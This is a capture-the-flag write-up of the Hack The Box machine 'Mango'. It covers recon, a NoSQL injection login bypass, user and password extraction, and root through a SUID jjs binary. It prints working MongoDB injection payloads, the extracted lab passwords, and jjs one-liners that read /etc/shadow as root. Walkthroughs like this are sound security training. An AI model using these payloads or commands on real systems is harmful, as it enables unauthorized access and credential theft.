[HTB] Mango — Write-up
Welcome to the HTB Mango write-up! This was a medium-difficulty Linux box. For the initial shell, MongoDB was leveraged with NoSQL exploit to brute-force the passwords for the user. For the root access, a program configured with permissive SUID was enough to escalate privilege to root. Let’s get started!
Recon
_________________________________________________________________
Nmap
Let’s begin with an initial port scan using the following command:
$ nmap -Pn — open -sC -sV -p- -T4 10.10.10.162
Interesting ports to note:
- HTTP (80/TCP) — Forbidden page error. Directory brute-forcing did not find anything juicy
- HTTPS (443/TCP) — Google looking like search engine called “Mango”
Except for “Analytics,” all other links are non- functional. On the “Analytics” page, there were some cool looking chart as well as other functions. However, this was a rabbit hole and did not get me anything to exploit.
Next, I inspected the certificate and found additional domain staging-order.mango.htb under the Common Name (CN) section.
By adding this domain into /etc/hosts file, we can not hit the delicious looking login page.
Initial Foothold (MongoDB + NoSQL)
_________________________________________________________________
I did some directory brute-forcing and some of the basic SQLi attacks against the login; however, nothing came back with good news. My next thought process was to guess things since HTB like to name the box as a hint sometimes. Mango seemed to be sounding similar to MongoDB, so I did some google search about MongoDB exploit. And I came across an old MMACTF 2016 write-up about MongoDB — Extracting data (admin password) using NoSQL Injection. This was basically talking about leveraging a NoSQL injection technique to bypass the authentication scheme to enumerate users and the passwords associated with them. Sounds juicy like mango :)
NoSQL Injection Attack
First thing first, I wanted to confirm it the login and the whatever backend DB (although I was very much convinced that it would be MongoDB) is vulnerable to NoSQL injection attack. I used some example proof-of-concepts (“PoC”) from the CTF write-up as well as PayloadsAllTheThings Github.
(1) Benign Login Attempt
Captured the login request providing with arbitrary admin : admin and the response came back as “200 OK” which it just redirects us to the same login page.
(2) NoSQL Injection Attack to Bypass Authentication
When running the following exploit, we get “302 Found” redirection response.
username[$ne]=admin&password[$ne]=admin&login=login
When we follow the redirection, we now successfully bypass the authentication to view the /home.php page.
The page was just static error page saying “Under Plantation” and nothing we can do anything with it. But what we can do further with NoSQL attack against databases is we can dump valid credentials from the databases.
NoSQL Injection Attack — User Enumeration
From the above error page, we can see that the user “admin” seem to be valid. We can quickly confirm this by doing the following:
### Valid User
username=admin&password[$ne]=password&login=login --> 302 Found
### Invalid User
username=noOne&password[$ne]=password&login=login --> 200 OK
Knowing this, I used Burp Intruder with rockyou.txt wordlist to enumerate valid users from the databases and found the following two (2) users:
- admin
- mango
NoSQL Injection Attack — Extracting Passwords
Next, I modified the PoC script from the CTF write-up to extract the passwords for the valid users. This exploit script can be found here.
Password found for “admin” user: t9KcS3>!0B#2
The password found for “mango” user: h3mXK8RhU~f{]f5H
User Access #1 (mango)
_________________________________________________________________
With the found credentials, we can now SSH into the box using “mango” username and password.
However, “mango” user does not have permission to read the user.txt flag.
User Access #2 (mango → admin)
_________________________________________________________________
Escalating to user “admin” from “mango” was pretty simple. We can simply do su admin and by providing her password, we now have access under the context of the “admin” user. We can also read the user.txt file.
Root Access
_________________________________________________________________
For the privilege escalation, I ran the LinEnum.sh script to quickly cover basic enumerate against the Mango box. And it found the following interesting SUID file:
What is interesting about this file is that its ownership is the “root” user; however, its group-owner is set with the “admin” user. Also, since setuid is set, any user can run the program with given permission; that is, the user “mango” may not be able to run the /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs program because it does not have proper permission. On the other hand, “admin” user can run that program under the context of the “root” user.
GTFobins — JJS Exploit
Quick search in GTFobins site, I was able to find a PoC script to exploit the jjs program.
The script is pretty self-explanatory. Using this, you can basically read any files as root permission.
### Reading /etc/shadow File
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/etc/shadow"));
while ((line = br.readLine()) != null) { print(line); }' | jjs
root.txt
### Reading /root/root.txt File
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjs
Conclusion
_________________________________________________________________
This was pretty straight-forward box. I enjoyed the NoSQL attacking part and creating a python script to brute-force the passwords using regex. Root part was a bit easy; however, it was really refresher about abusing SUID configurations. Thanks for the creator MrR3boot to make the fun box.
Hope you enjoyed my write-up and thank you for reading!
